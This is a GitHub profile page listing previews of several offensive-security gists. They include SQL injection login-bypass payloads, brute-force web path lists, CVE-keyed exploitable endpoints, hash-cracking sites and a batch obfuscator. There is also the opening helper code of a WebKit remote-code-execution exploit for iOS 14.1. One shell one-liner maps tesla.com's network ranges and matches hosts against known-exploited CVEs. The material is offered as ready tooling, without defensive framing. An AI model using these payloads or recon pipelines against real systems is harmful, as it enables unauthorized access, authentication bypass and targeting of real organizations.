Skip to content

Instantly share code, notes, and snippets.

View hxlxmj's full-sized avatar

Halim J. hxlxmj

49 followers · 174 following
View GitHub Profile
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active April 20, 2026 01:12
Subdomain Wordlist
@richlamdev
richlamdev / hash lookups
Last active March 2, 2026 12:21
Hash lookups online
LIST OF WEBSITES DEHASH / HASH ONLINE
https://crackstation.net/
http://crypo.in.ua/tools/
http://www.md5decrypter.co.uk/
http://www.md5this.com/index.php
http://md5hack.com/
http://www.miraclesalad.com/webtools/md5.php
http://hash.online-convert.com/md5-generator
http://md5decryption.com/
@vijay922
vijay922 / ExploitDB.txt
Last active December 3, 2025 21:17
frs/admin/qrs.php
__admin
__cache/
__index.php
__MACOSX
__pma___
__SQL
__test.php
_.htpasswd
_adm
@spenkk
spenkk / sqli-auth-bypass.txt
Created November 17, 2020 14:10
SQL Injection Authentication Bypass payloads
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
@fuckup1337
fuckup1337 / JavascriptRecon.md
Created January 18, 2021 20:02
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@kafkaesqu3
kafkaesqu3 / exploitable_webpaths.md
Last active October 8, 2025 15:50
easy wins - exploitable/leaky web paths
Exploit/description Path
Microsoft Office Online Server SSRF (relay) /op/view.aspx
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519 /jobmanager/logs/
CVE-2017-7615 /verify.php?id=1&confirm_hash=
CVE-2018-1000130 /jolokia
CVE-2018-1000130 /actuator/jolokia
leak /actuator/env
@ujin5
ujin5 / fuck.js
Last active December 27, 2025 18:15
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
@a-sync
a-sync / deobf.cmd
Last active May 10, 2024 07:29
batch obfuscator / deobfuscator
@echo off & setlocal
if "%~1"=="" exit /b
if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b
<"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1")
@nullenc0de
nullenc0de / Shodan_scan
Last active October 11, 2025 06:27
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt
subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3 |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt